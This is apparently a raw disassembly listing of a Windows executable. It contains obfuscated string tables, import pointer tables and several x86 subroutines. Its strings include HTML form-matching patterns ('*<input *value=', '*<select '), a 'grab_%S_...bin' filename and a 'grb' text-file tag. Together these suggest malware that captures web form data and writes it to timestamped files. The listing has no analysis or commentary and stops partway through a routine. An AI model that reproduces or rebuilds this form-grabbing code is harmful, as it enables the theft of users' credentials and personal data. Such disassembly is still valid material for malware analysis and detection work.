dd 9895929Fh, 2E608Fh, 0B4A89D12h, 0ACA1B4A9h, 0A69992ABh
dd 99948A93h, 979A9Bh, 67958711h, 5F5C78B5h, 577540ABh
dd 4F4C68A5h, 309Bh, 91868712h, 9B5C7F86h, 97ABA9A6h, 3466A1A2h
dd 974B32h, 0B787872Ch, 0A7ABB2B3h, 9787A89Dh, 8D95A4A2h
dd 9089738Dh, 8E8A6395h, 81648F8Ah, 49807C79h, 76777B6Bh
dd 63706141h, 29316467h, 25h, 0B6AC8740h, 74AFAEB4h, 0A0A36567h
dd 8F9A979Ch, 9697878Dh, 7B7E4C43h, 78838186h, 7C717B71h
dd 30656971h, 29696D63h, 1F5D5D5Bh, 195A5752h, 11574751h
dd 49230D0Ah, 372B454Ch, 373B313Ch, 2Dh, 0B1B48705h, 71B0h
dd 0B6AA8704h, 0B0h, 0B569871Bh, 5F6B6D7Ah, 0A55970ABh
dd 58A15370h, 47529B4Dh, 8F414C95h, 41893B52h, 0
dword_402424 dd 0B0A5870Ah, 0A7B5ACAFh, 0A7ABA7h, 8B908705h, 9293h
; DATA XREF: .data:0040F568�o
; .data:0040F564�o
dd 96978705h, 9281h, 83948705h, 9493h, 878A8705h, 9281h
dd 9B988705h, 8390h, 0A78F8707h, 5A76B1B9h, 0
dword_402464 dd 0B187871Ah, 0A8A1B2AEh, 0AB8863ACh, 4A6693A0h, 7C2E994Dh
; DATA XREF: .data:0040F54C�o
dd 54606763h, 873B38h, 0B569871Bh, 0A0A1904Ah, 0A499A89Dh
dd 9D514E6Ah, 66974B32h, 547D9281h, 85392022h, 0
aZeKeaskabuDwqa db '"‡¥²°ª¥™ª¡ž]¤WŸ›O†Ž‡E‹†~u|oylkh',0 ; DATA XREF: .data:0040F544�o
dword_4024C4 dd 95948715h, 9FAEADB4h, 9399A87Bh, 987593A4h, 90859A9Bh
; DATA XREF: .data:0040F540�o
dd 8383h, 0AF898706h, 0B5B2B0h, 9594870Dh, 0AE9DA260h
dd 3C3E7099h, 0A155h, 957E9D0Ch, 0A8A5B0B4h, 0A6957A9Fh
dd 91h, 0B5B4870Ch, 9FAEADB4h, 9E98649Bh, 9Ch, 0B1A79D08h
dd 9FA5A9AFh, 72h, 0A7B08706h, 9FA3B8h, 0A7B08707h, 0A39FA3B8h
dd 0
dword_402534 dd 0A7B68706h, 9FA3B8h, 0A7B68707h, 0A39FA3B8h, 0
; DATA XREF: .data:0040F520�o
; .data:0040F51C�o
dword_402548 dd 0B1AF8704h, 0B3h, 0B0B9870Dh, 9DABAAA2h, 939A95A3h
; DATA XREF: .data:0040F518�o
; .data:0040F514�o
dd 939Bh, 0AEA6870Bh, 99A7A1AFh, 979F979Eh, 0
dword_402570 dd 0B0B9870Ch, 9DABAAA2h, 0A4A995A3h, 9Ch, 0AEA6870Ah
; DATA XREF: .data:0040F50C�o
dd 99A7A1AFh, 0A0A8ADh, 0A7B6870Bh, 9FA99FAEh, 0A6A39897h
dd 0
dword_40259C dd 0A4AF8705h, 0B2AFh, 0B2B98706h, 0A3A4A3h, 0A7B6870Ah
; DATA XREF: .data:0040F500�o
; .data:0040F4FC�o
dd 0A1B0A3B3h, 9697AAh, 0AAB78709h, 0A9A0B2B5h, 0A4AFh
dd 0A7B68707h, 0AEABADA2h, 0
dword_4025D0 dd 0A7888709h, 9FB0A3ACh, 797Ch, 0A788870Dh, 9FB0A3ACh
; DATA XREF: .data:0040F4EC�o
; .data:0040F4E8�o
dd 979E9887h, 0A293h, 0AB868707h, 0AEA880B4h, 0
dword_4025F8 dd 0A797870Dh, 0AE9FA3ACh, 979E9887h, 0A293h, 0B4878717h
; DATA XREF: .data:0040F4E0�o
dd 9FB09FA5h, 0A2A1A57Bh, 8C95A291h, 8B668B94h, 8A7D8B94h
dd 0
dword_402624 dd 0A78B870Eh, 0B0A182B4h, 759999A1h, 9F9E91h, 0B4878713h
; DATA XREF: .data:0040F4D8�o
dd 9FB09FA5h, 0A2A1A57Bh, 8C95A291h, 65688B94h, 0
dword_40264C dd 0B487870Ah, 9FB09FA5h, 75797Ch, 0B4878716h, 9FB09FA5h
; DATA XREF: .data:0040F4D0�o
; .data:0040F4CC�o
dd 97A6AA8Bh, 987B9B91h, 91906D70h, 887F82h, 0A68B8716h
dd 9B8FAEA9h, 9F7D9BAEh, 7E919591h, 94987997h, 897F85h
dd 0A68B8715h, 9F83AEA9h, 93A17FACh, 98719397h, 8788958Bh
dd 9192h, 0A68B8719h, 9F83AEA9h, 93A17FACh, 98719397h
dd 8788958Bh, 836F9192h, 7B92h, 0A68B8711h, 0A380AEA9h
dd 0A5A3A6ABh, 8B997795h, 8B8Fh, 0A68B871Ch, 0AC7FAEA9h
dd 97A8979Dh, 97A09772h, 946A9689h, 5C648B8Fh, 53616A61h
dd 60h, 0A68B8710h, 0AFA8AEA9h, 0A79C89ABh, 0A19B92A4h
dd 96h, 0A68B870Fh, 0AFA8AEA9h, 93A889ABh, 9AA1A2A2h, 0
dword_402718 dd 8B888708h, 7B888E93h, 91h, 0A6AB870Ah, 686E71A9h, 0A0A29Ch
; DATA XREF: .data:0040F4AC�o
; .data:0040F4A8�o
dd 0AEB3870Ah, 686E71A5h, 0A0A29Ch, 0A6AB870Ch, 0AFA8AEA9h
dd 9E9864ABh, 9Ch, 0A7A88708h, 0A6B19FA6h, 0ACh, 0ABBB8708h
dd 9BB0B1AEh, 68h, 0A5B79D19h, 0A8A1A3B2h, 0A55992ABh
dd 5E5C538Ch, 52498580h, 844A7658h, 7D88h, 0AFAD9D0Bh
dd 69A1A5A1h, 9999A6A2h, 0
dword_402790 dd 676E870Eh, 0AF616CB5h, 60A95B66h, 56A355h, 0A7979D14h
; DATA XREF: .data:0040F48C�o
dd 0AEB1A693h, 0A0ABA59Ch, 0A095A080h, 89899291h, 85h
dd 0A7979D11h, 0AF9EA384h, 9BA6869Fh, 8F9897A6h, 8B8Fh
dd 0A797870Dh, 0ACAE83B4h, 0A181A8A7h, 9394h, 0AEBE9D0Dh
dd 9FA5AAA3h, 9762AAA6h, 93A8h, 0B7B39D0Ch, 0ADABAEB4h
dd 0AA9964ACh, 95h, 0B6B29D0Ah, 68A8AAA4h, 0A0A29Ch, 0A38C8705h
dd 0AAACh, 0B5699D08h, 726C639Fh, 90h, 72699D0Fh, 6A619678h
dd 62598E70h, 82518668h, 0
dword_402830 dd 0B5A79D0Ah, 68AFB1B2h, 99AE9Dh, 0BBB78707h, 0A7A1B2B3h
; DATA XREF: .data:0040F464�o
; .data:0040F460�o
dd 0
dword_402848 dd 0B1B78709h, 9BB3B2A6h, 9BAAh, 0B5B99D09h, 0A8A5B0A5h
; DATA XREF: .data:0040F45C�o
; .data:0040F458�o
dd 0AAA1h, 0B1B79D2Eh, 9BB3B2A6h, 9F909BAAh, 999E9199h
dd 968A959Bh, 8885957Ch, 858B857Ch, 7C81716Ch, 76726B7Ah
dd 6D6E6376h, 4E626561h, 5A6362h, 0B1B79D36h, 9BB3B2A6h
dd 9F909BAAh, 999E9199h, 968A959Bh, 8885957Ch, 858B857Ch
dd 66807C30h, 74767B6Bh, 70706C65h, 5B67685Dh, 61485C5Fh
dd 51505451h, 4A4D47h, 8B999D04h, 84h, 0B1B79D35h, 9BB3B2A6h
dd 9F909BAAh, 999E9199h, 968A959Bh, 8885957Ch, 858B857Ch
dd 66807C30h, 74767B6Bh, 70706C65h, 5B67685Dh, 58485C5Fh
dd 515B5A4Dh, 4952h, 0B1B79D33h, 9BB3B2A6h, 9F909BAAh
dd 999E9199h, 968A959Bh, 8885957Ch, 858B857Ch, 7C81716Ch
dd 76726B7Ah, 6D6E6376h, 4E626561h, 565C6655h, 54495857h
dd 0
dword_402940 dd 0B1918733h, 0A6A8A7BAh, 60686599h, 8D544E60h, 83949397h
; DATA XREF: .data:0040F440�o
dd 867E8794h, 5F34517Dh, 2A515763h, 3D34343Eh, 68655520h
dd 656B655Ch, 0A403C10h, 0B15141Dh, 0
dword_402978 dd 0A1A39D15h, 8E8F9793h, 9193837Dh, 5D6F5F69h, 57545F60h
; DATA XREF: .data:0040F43C�o
dd 7D7Fh, 0A1A39D15h, 8E8F9793h, 9193837Dh, 6E6D6266h
dd 57565C58h, 7D7Fh, 0A1A39D15h, 8E8F9793h, 9193837Dh
dd 5F607467h, 5769595Ah, 7D7Fh, 0A1A39D15h, 8E8F9793h
dd 9193837Dh, 5C6D6364h, 53545C6Eh, 7D7Fh, 0A1A39D15h
dd 8E8F9793h, 9193837Dh, 62706162h, 52556C58h, 7D7Fh, 9B979D07h
dd 87819293h, 0
dword_4029FC dd 0A5729D05h, 9FACh, 0BAA99D0Dh, 0ACABAAB0h, 9762A89Dh
; DATA XREF: .data:0040F424�o
; .data:0040F420�o
dd 93A8h, 0B8B79D0Ch, 0ADABA6A3h, 0AA9964ACh, 95h, 0ABBB9D0Dh
dd 0A1ABAAAEh, 9762A4A7h, 93A8h, 0B6B29D09h, 9F6AB1AFh
dd 9BB0h, 0ABBA9D0Ah, 68ABA3A4h, 0A0A29Ch, 0B7A59D0Ah
dd 68ABA7A4h, 0A0A29Ch
dword_402A58 dd 0B5BB9D08h, 9FABAEAEh, 0A5h, 0off_402A68 dd offset dword_402228 ; DATA XREF: sub_40A555+2�o
; sub_41BA7B+2�o
dd offset dword_40FD34
dd offset dword_4021D0+44h
dd offset dword_40FD38
dd offset dword_4021D0+34h
dd offset dword_40FD3C
dd offset dword_4021D0+24h
dd offset dword_40FD40
dd offset dword_4021D0+10h
dd offset dword_40FD44
dd offset dword_4021D0
dd offset dword_40FD48
dd offset dword_402064+158h
dd offset dword_40FD4C
dd offset dword_402064+14Ch
dd offset dword_40FD50
dd offset dword_402064+134h
dd offset dword_40FD54
dd offset dword_402064+124h
dd offset dword_40FD58
dd offset dword_402064+108h
dd offset dword_40FD5C
dd offset dword_402064+0F8h
dd offset dword_40FD60
dd offset dword_402064+0E4h
dd offset dword_40FD64
dd offset dword_402064+0DCh
dd offset dword_40FD68
dd offset dword_402064+0D0h
dd offset dword_40FD6C
dd offset dword_402064+0BCh
dd offset dword_40FD70
dd offset dword_402064+0A8h
dd offset dword_40FD74
dd offset dword_402064+98h
dd offset dword_40FD78
dd offset dword_402064+88h
dd offset dword_40FD7C
dd offset dword_402064+7Ch
dd offset dword_40FD80
dd offset dword_402064+6Ch
dd offset dword_40FD84
dd offset dword_402064+60h
dd offset dword_40FD88
dd offset dword_402064+54h
dd offset dword_40FD8C
dd offset dword_402064+48h
dd offset dword_40FD90
dd offset dword_402064+3Ch
dd offset dword_40FD94
dd offset dword_402064+30h
dd offset dword_40FD98
dd offset dword_402064+24h
dd offset dword_40FD9C
dd offset dword_402064+18h
dd offset dword_40FDA0
dd offset dword_402064+0Ch
dd offset dword_40FDA4
dd offset dword_402064
dd offset dword_40FDA8
dd offset dword_402054
dd offset dword_40FDAC
dd offset dword_402030+14h
dd offset dword_40FDB0
dd offset dword_402030
dd offset dword_40FDB4
dd offset dword_40200C+0Ch
dd offset dword_40FDB8
dd offset dword_40200C
dd offset dword_40FDBC
dd offset dword_401FD0+2Ch
dd offset dword_40FDC0
dd offset dword_401FD0+1Ch
dd offset dword_40FDC4
dd offset dword_401FD0+0Ch
dd offset dword_40FDC8
dd offset dword_401FD0
dd offset dword_40FDCC
dd offset dword_401F90+30h
dd offset dword_40FDD0
dd offset dword_401F90+24h
dd offset dword_40FDD4
dd offset dword_401F90+10h
dd offset dword_40FDD8
dd offset dword_401F90
dd offset dword_40FDDC
dd offset dword_401F14+60h
dd offset dword_40FDE0
dd offset dword_401F14+4Ch
dd offset dword_40FDE4
dd offset dword_401F14+3Ch
dd offset dword_40FDE8
dd offset dword_401F14+28h
dd offset dword_40FDEC
dd offset dword_401F14+1Ch
dd offset dword_40FDF0
dd offset dword_401F14+10h
dd offset dword_40FDF4
dd offset dword_401F14
dd offset dword_40FDF8
dd offset dword_401EE0+24h
dd offset dword_40FDFC
dd offset dword_401EE0+10h
dd offset dword_40FE00
dd offset dword_401EE0
dd offset dword_40FE04
dd offset dword_401E88+40h
dd offset dword_40FE08
dd offset dword_401E88+2Ch
dd offset dword_40FE0C
dd offset dword_401E88+1Ch
dd offset dword_40FE10
dd offset dword_401E88
dd offset dword_40FE14
dd offset dword_401E10+64h
dd offset dword_40FE18
dd offset dword_401E10+54h
dd offset dword_40FE1C
dd offset dword_401E10+44h
dd offset dword_40FE20
dd offset dword_401E10+34h
dd offset dword_40FE24
dd offset dword_401E10+24h
dd offset dword_40FE28
dd offset dword_401E10+14h
dd offset dword_40FE2C
dd offset dword_401E10
dd offset dword_40FE30
dd offset dword_401DCC+34h
dd offset dword_40FE34
dd offset dword_401DCC+24h
dd offset dword_40FE38
dd offset dword_401DCC+14h
dd offset dword_40FE3C
dd offset dword_401DCC
dd offset dword_40FE40
dd offset dword_401D54+60h
dd offset dword_40FE44
dd offset dword_401D54+4Ch
dd offset dword_40FE48
dd offset dword_401D54+38h
dd offset dword_40FE4C
dd offset dword_401D54+24h
dd offset dword_40FE50
dd offset dword_401D54+10h
dd offset dword_40FE54
dd offset dword_401D54
dd offset dword_40FE58
dd offset dword_401D40
dd offset dword_40FE5C
dd offset dword_401D28
dd offset dword_40FE60
dd offset dword_401D10
dd offset dword_40FE64
dd offset dword_401BF8+108h
dd offset dword_40FE68
dd offset dword_401BF8+0F4h
dd offset dword_40FE6C
dd offset dword_401BF8+0E4h
dd offset dword_40FE70
dd offset dword_401BF8+0D4h
dd offset dword_40FE74
dd offset dword_401BF8+0C4h
dd offset dword_40FE78
dd offset dword_401BF8+0B0h
dd offset dword_40FE7C
dd offset dword_401BF8+94h
dd offset dword_40FE80
dd offset dword_401BF8+7Ch
dd offset dword_40FE84
dd offset dword_401BF8+64h
dd offset dword_40FE88
dd offset dword_401BF8+54h
dd offset dword_40FE8C
dd offset dword_401BF8+40h
dd offset dword_40FE90
dd offset dword_401BF8+30h
dd offset dword_40FE94
dd offset dword_401BF8+20h
dd offset dword_40FE98
dd offset dword_401BF8+14h
dd offset dword_40FE9C
dd offset dword_401BF8
dd offset dword_40FEA0
dd offset dword_401BE8
dd offset dword_40FEA4
dd offset dword_401BA0+38h
dd offset dword_40FEA8
dd offset dword_401BA0+2Ch
dd offset dword_40FEAC
dd offset dword_401BA0+1Ch
dd offset dword_40FEB0
dd offset dword_401BA0
dd offset dword_40FEB4
off_402D70 dd offset dword_401B84 ; DATA XREF: sub_40A555+22�o
; sub_41BA7B+22�o
dd offset dword_40FBA8
off_402D78 dd offset dword_401B74 ; DATA XREF: sub_40A555+49�o
; sub_41BA7B+49�o
dd offset dword_40FC28
dd offset dword_4011B8+0A0h
dd offset dword_40FC2C
dd offset dword_401B58
dd offset dword_40FC30
dd offset dword_4011B8+64h
dd offset dword_40FC34
dd offset dword_4011B8+94h
dd offset dword_40FC38
dd offset dword_401B44
dd offset dword_40FC3C
dd offset dword_4011B8+7Ch
dd offset dword_40FC40
off_402DB0 dd offset dword_401B38 ; DATA XREF: sub_40A555+6A�o
; sub_41BA7B+6A�o
dd offset dword_40FC70
dd offset dword_401B20+0Ch
dd offset dword_40FC74
dd offset dword_401B20
dd offset dword_40FC78
dd offset dword_401B10
dd offset dword_40FC7C
dd offset dword_401AC4+3Ch
dd offset dword_40FC80
dd offset dword_401AC4+30h
dd offset dword_40FC84
dd offset dword_401AC4+24h
dd offset dword_40FC88
dd offset dword_401AC4+14h
dd offset dword_40FC8C
dd offset dword_401AC4
dd offset dword_40FC90
dd offset dword_401AB0
dd offset dword_40FC94
dd offset dword_401A60+38h
dd offset dword_40FC98
dd offset dword_401A60+28h
dd offset dword_40FC9C
dd offset dword_401A60+18h
dd offset dword_40FCA0
off_402E18 dd offset dword_401A60 ; DATA XREF: sub_40A555+8B�o
; sub_41BA7B+8B�o
dd offset dword_40FCAC
off_402E20 dd offset dword_401A50 ; DATA XREF: sub_40A555+B1�o
; sub_41BA7B+B1�o
dd offset dword_40FB3C
dd offset dword_40112C+28h
dd offset dword_40FB40
dd offset dword_40196C+0D0h
dd offset dword_40FB44
dd offset dword_40196C+0BCh
dd offset dword_40FB48
dd offset dword_40196C+0A8h
dd offset dword_40FB4C
dd offset dword_4011B8+3Ch
dd offset dword_40FB50
dd offset dword_4011B8
dd offset dword_40FB54
dd offset dword_40196C+94h
dd offset dword_40FB58
dd offset dword_40196C+78h
dd offset dword_40FB5C
dd offset dword_40112C+18h
dd offset dword_40FB60
dd offset dword_40196C+60h
dd offset dword_40FB64
dd offset dword_4011B8+50h
dd offset dword_40FB68
dd offset dword_4011B8+28h
dd offset dword_40FB6C
dd offset dword_4011B8+14h
dd offset dword_40FB70
dd offset dword_40196C+48h
dd offset dword_40FB74
dd offset dword_40196C+30h
dd offset dword_40FB78
dd offset dword_40116C
dd offset dword_40FB7C
dd offset dword_4011A0
dd offset dword_40FB80
dd offset dword_40116C+1Ch
dd offset dword_40FB84
dd offset dword_40196C+14h
dd offset dword_40FB88
dd offset dword_40196C
dd offset dword_40FB8C
dd offset dword_40112C+8
dd offset dword_40FB90
dd offset dword_4018FC+54h
dd offset dword_40FB94
dd offset dword_4018FC+3Ch
dd offset dword_40FB98
dd offset dword_4018FC+28h
dd offset dword_40FB9C
dd offset dword_4018FC+10h
dd offset dword_40FBA0
off_402EF0 dd offset dword_4018FC ; DATA XREF: sub_40A555+D2�o
; sub_41BA7B+D2�o
dd offset dword_40FBC4
dd offset dword_4018B8+2Ch
dd offset dword_40FBC8
dd offset dword_4018B8+14h
dd offset dword_40FBCC
dd offset dword_4018B8
dd offset dword_40FBD0
dd offset dword_401878+28h
dd offset dword_40FBD4
dd offset dword_401878+14h
dd offset dword_40FBD8
dd offset dword_401878
dd offset dword_40FBDC
dd offset dword_401864
dd offset dword_40FBE0
dd offset dword_401844+10h
dd offset dword_40FBE4
dd offset dword_401844
dd offset dword_40FBE8
dd offset dword_4017A0+90h
dd offset dword_40FBEC
dd offset dword_4017A0+80h
dd offset dword_40FBF0
dd offset dword_4017A0+60h
dd offset dword_40FBF4
dd offset dword_4017A0+44h
dd offset dword_40FBF8
dd offset dword_4017A0+2Ch
dd offset dword_40FBFC
dd offset dword_4017A0+18h
dd offset dword_40FC00
dd offset dword_4017A0
dd offset dword_40FC04
dd offset dword_401754+38h
dd offset dword_40FC08
dd offset dword_401754+28h
dd offset dword_40FC0C
dd offset dword_401754+14h
dd offset dword_40FC10
dd offset dword_401754
dd offset dword_40FC14
dd offset dword_40173C
dd offset dword_40FC18
off_402FA0 dd offset dword_40112C ; DATA XREF: sub_40A555+F8�o
; sub_41BA7B+F8�o
dd offset dword_40FCBC
dd offset dword_401114
dd offset dword_40FCC0
dd offset dword_4010FC+0Ch
dd offset dword_40FCC4
dd offset dword_4010FC
dd offset dword_40FCC8
dd offset dword_401124
dd offset dword_40FCCC
dd offset dword_4016D8+54h
dd offset dword_40FCD0
dd offset dword_4016D8+4Ch
dd offset dword_40FCD4
dd offset dword_4016D8+44h
dd offset dword_40FCD8
dd offset dword_4016D8+3Ch
dd offset dword_40FCDC
dd offset dword_4016D8+34h
dd offset dword_40FCE0
dd offset dword_4016D8+28h
dd offset dword_40FCE4
dd offset dword_4016D8+1Ch
dd offset dword_40FCE8
dd offset dword_4016D8+14h
dd offset dword_40FCEC
dd offset dword_4016D8+8
dd offset dword_40FCF0
dd offset dword_4016D8
dd offset dword_40FCF4
dd offset dword_4016A0+2Ch
dd offset dword_40FCF8
dd offset dword_4016A0+20h
dd offset dword_40FCFC
dd offset dword_4016A0+10h
dd offset dword_40FD00
off_403030 dd offset dword_40112C ; DATA XREF: sub_40A555+11E�o
; sub_41BA7B+11E�o
dd offset dword_40FBB4
dd offset dword_401124
dd offset dword_40FBB8
dd offset dword_401114
dd offset dword_40FBBC
off_403048 dd offset dword_4016A0 ; DATA XREF: sub_40A555+140�o
; sub_41BA7B+140�o
dd offset dword_40FACC
dd offset dword_401690
dd offset dword_40FAD0
dd offset dword_401088+34h
dd offset dword_40FAD4
dd offset dword_401088+54h
dd offset dword_40FAD8
dd offset dword_4010EC
dd offset dword_40FADC
dd offset dword_401088+44h
dd offset dword_40FAE0
dd offset dword_401614+6Ch
dd offset dword_40FAE4
dd offset dword_401088+20h
dd offset dword_40FAE8
dd offset dword_401614+60h
dd offset dword_40FAEC
dd offset dword_401614+4Ch
dd offset dword_40FAF0
dd offset dword_401614+30h
dd offset dword_40FAF4
dd offset dword_401614+1Ch
dd offset dword_40FAF8
dd offset dword_401614
dd offset dword_40FAFC
dd offset dword_4015D4+28h
dd offset dword_40FB00
dd offset dword_4015D4+14h
dd offset dword_40FB04
dd offset dword_4015D4
dd offset dword_40FB08
dd offset dword_401584+34h
dd offset dword_40FB0C
dd offset dword_401584+24h
dd offset dword_40FB10
dd offset dword_401584+14h
dd offset dword_40FB14
dd offset dword_401584
dd offset dword_40FB18
dd offset dword_401558+1Ch
dd offset dword_40FB1C
dd offset dword_401558+0Ch
dd offset dword_40FB20
dd offset dword_401558
dd offset dword_40FB24
dd offset dword_401534+14h
dd offset dword_40FB28
off_403108 dd offset dword_401534 ; DATA XREF: sub_40A555+15D�o
; sub_41BA7B+15D�o
dd offset dword_40FC68
off_403110 dd offset dword_40151C ; DATA XREF: sub_40A555+17F�o
; sub_41BA7B+17F�o
dd offset dword_40FC48
dd offset dword_40150C
dd offset dword_40FC4C
dd offset dword_4014CC+20h
dd offset dword_40FC50
dd offset dword_4014CC
dd offset dword_40FC54
dd offset dword_401494+14h
dd offset dword_40FC58
dd offset dword_401494
dd offset dword_40FC5C
dd offset dword_401088+0Ch
dd offset dword_40FC60
off_403148 dd offset aBr ; DATA XREF: sub_409123+C4�r
; sub_41A649+C4�r
; "br"
dd offset aHr ; "hr"
dd offset aTr ; "tr"
dd offset aTd ; "td"
dword_403158 dd 2020202h ; sub_41A649+B6�r
byte_40315C db 0Ah ; DATA XREF: sub_409123+FB�r
; sub_41A649+FB�r
db 2 dup(0Ah), 20h
dd offset aScript ; "script"
dd 7073626Eh, 3Bh ; DATA XREF: sub_409123+134�o
; sub_41A649+134�o
a_Pipe: ; DATA XREF: sub_4093DB+3�o
; sub_41A901+3�o
unicode 0, <\\.\pipe\>,0
dword_403180 dd 0 ; sub_41B2FA+26�o
asc_403184: ; DATA XREF: sub_409EB5+F9�o
; sub_41B3DB+F9�o
unicode 0, <,>,0
aZspjudv db 9,'µ°§spjž¤¢',0 ; DATA XREF: sub_40A555+162�o
; sub_41BA7B+162�o
align 4
dword_403194 dd 0B8A8A70Ch, 6DA5AEA1h, 9E98646Ah, 9Ch ; sub_41BA7B+D7�o
dword_4031A4 dd 0A3B7B609h, 9E6AA7B0h, 0A2A4h ; sub_41BA7B+90�o
dword_4031B0 dd 0AEACB90Bh, 0A3AC9FB7h, 9EA09A66h, 0 ; sub_41BA7B+6F�o
dword_4031C0 dd 0A7ACB90Bh, 6C6FAAACh, 9EA09A66h, 0 ; sub_41BA7B+27�o
dword_4031D0 dd 0B4A9B10Ch, 6DA8A3AEh, 9E98646Ah, 9Ch ; sub_41BA7B+7�o
dword_4031E0 dd 3D7026h ; .data:0041D14C�o
dword_4031E4 dd 3D34h ; .data:0041D0B1�o
dword_4031E8 dd 3D31h ; .data:0041D418�o
aInputValue db '*<input *value="',0 ; DATA XREF: .text:0040C414�o
; .data:0041D93A�o
align 10h
aOptionSelected db '*<option selected',0 ; DATA XREF: .text:0040C39A�o
; .data:0041D8C0�o
align 4
aSelect db '*<select ',0 ; DATA XREF: .text:0040C35F�o
; .data:0041D885�o
align 10h
a0Uu db '%%0%uu',0 ; DATA XREF: .text:0040CB0C�o
; sub_41DCA5+38D�o
align 4
aGrab_S_02u_02u: ; DATA XREF: .text:0040D6C7�o
; sub_41E71F+4CE�o
unicode 0, <grab_%S_%02u_%02u_%02u.bin>,0
byte_40325E db 0 ; DATA XREF: .data:0040E229�o
; sub_41F4B6+298�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40325F proc near ; CODE XREF: sub_4033BC+15�p
var_E8 = byte ptr -0E8h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push edi
push [ebp+arg_0]
xor ebx, ebx
push ebx
mov [ebp+var_1], bl
call dword_40FC48
mov edi, eax
cmp edi, ebx
jz loc_4033B5
push 4
push [ebp+arg_4]
lea eax, [ebp+var_C]
push eax
push edi
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
call dword_40FC5C
test eax, eax
jz loc_4033AD
test [ebp+arg_8], 1
push esi
mov [ebp+var_10], ebx
mov esi, offset dword_401000
jnz short loc_4032CF
lea eax, [ebp+var_10]
push eax
push esi
call sub_40A476
cmp eax, 4
pop ecx
pop ecx
jnz short loc_4032CF
mov eax, [ebp+var_10]
mov eax, [eax]
cmp eax, [ebp+var_C]
jnz short loc_4032CF
mov [ebp+var_1], 1
loc_4032CF: ; CODE XREF: sub_40325F+4F�j
; sub_40325F+60�j ...
push [ebp+var_10]
call sub_409317
cmp [ebp+var_C], 200h
pop ecx
jnb short loc_4032EA
mov [ebp+var_1], 1
jmp loc_4033AC
; ---------------------------------------------------------------------------
loc_4032EA: ; CODE XREF: sub_40325F+80�j
cmp [ebp+var_1], bl
jnz loc_4033AC
push [ebp+var_C]
call sub_4092F9
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jz loc_4033AC
push 4
push [ebp+arg_4]
lea eax, [ebp+var_C]
push eax
push edi
call dword_40FC5C
test eax, eax
jz loc_4033A3
lea eax, [ebp+var_20]
push eax
call dword_40FE8C ; GetSystemTime
movzx eax, [ebp+var_20]
push eax
movzx eax, [ebp+var_1E]
push eax
movzx eax, [ebp+var_1A]
push eax
push [ebp+arg_0]
mov eax, dword_40FB34
push dword ptr [eax+1B0h]
lea eax, [ebp+var_E8]
push 63h
push eax
call dword_40FC84
push [ebp+var_C]
lea eax, [ebp+var_E8]
push [ebp+var_8]
push eax
call sub_40B850
add esp, 28h
test al, al
jz short loc_4033A3
push 4
lea eax, [ebp+var_C]
push eax
push esi
call sub_40A4C3
add esp, 0Ch
mov [ebp+var_1], al
push ebx
jmp short loc_403396
; ---------------------------------------------------------------------------
loc_403383: ; CODE XREF: sub_40325F+142�j
push esi
call dword_40FC58
cmp eax, ebx
jz short loc_403395
push eax
call dword_40FC54
loc_403395: ; CODE XREF: sub_40325F+12D�j
push esi
loc_403396: ; CODE XREF: sub_40325F+122�j
push edi
call dword_40FC50
mov esi, eax
cmp esi, ebx
jnz short loc_403383
loc_4033A3: ; CODE XREF: sub_40325F+BA�j
; sub_40325F+10D�j
push [ebp+var_8]
call sub_409317
pop ecx
loc_4033AC: ; CODE XREF: sub_40325F+86�j
; sub_40325F+8E�j ...
pop esi
loc_4033AD: ; CODE XREF: sub_40325F+3C�j
push ebx
push edi
call dword_40FC4C
loc_4033B5: ; CODE XREF: sub_40325F+1E�j
mov al, [ebp+var_1]
pop edi
pop ebx
leave
retn
sub_40325F endp
; =============== S U B R O U T I N E =======================================
sub_4033BC proc near ; CODE XREF: .text:00405608�p
arg_0 = dword ptr 4
push [esp+arg_0]
mov eax, dword_40FB34
push dword ptr [eax+1A8h]
push dword ptr [eax+1ACh]
call sub_40325F
add esp, 0Ch
retn
sub_4033BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_4033DA proc near ; DATA XREF: .data:0040F2A0�o
var_D8 = byte ptr -0D8h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 0D8h
push ebx
mov ebx, [ebp+6Ch+arg_4]
push esi
mov esi, [ebp+6Ch+arg_0]
push edi
push [ebp+6Ch+arg_8]
push ebx
push esi
call dword_40FC60
mov edi, eax
test edi, edi
jz loc_403494
test esi, esi
jz loc_403494
cmp dword ptr [esi], 0
jz loc_403494
cmp dword ptr [esi+4], 0
jz short loc_403494
lea eax, [ebp+6Ch+var_10]
push eax
call dword_40FE8C ; GetSystemTime
movzx eax, [ebp+6Ch+var_10]
push eax
movzx eax, [ebp+6Ch+var_E]
push eax
movzx eax, [ebp+6Ch+var_A]
push eax
mov eax, dword_40FB34
push offset aGrb ; "grb"
push dword ptr [eax+1B0h]
lea eax, [ebp+6Ch+var_D8]
push 63h
push eax
call dword_40FC84
push dword ptr [esi]
lea eax, [ebp+6Ch+var_D8]
push dword ptr [esi+4]
push eax
call sub_40B850
add esp, 28h
test al, al
jz short loc_403492
test ebx, ebx
jz short loc_403494
push offset a_txt ; ".txt"
lea eax, [ebp+6Ch+var_D8]
push eax
call dword_40FDA4 ; lstrcatW
push ebx
call dword_40FD90 ; lstrlenW
add eax, eax
push eax
lea eax, [ebp+6Ch+var_D8]
push ebx
push eax
call sub_40B850
add esp, 0Ch
test al, al
jnz short loc_403494
loc_403492: ; CODE XREF: sub_4033DA+88�j
xor edi, edi
loc_403494: ; CODE XREF: sub_4033DA+23�j
; sub_4033DA+2B�j ...
mov eax, edi
pop edi
pop esi
pop ebx
add ebp, 6Ch
leave
retn 0Ch
sub_4033DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034A0 proc near ; CODE XREF: sub_403B25�p
; sub_404222+A3�p ...
var_208 = byte ptr -208h
push ebp
mov ebp, esp
sub esp, 208h
push esi
mov esi, offset dword_40F5D0
push esi
call sub_409CBA
mov eax, dword_40FB34
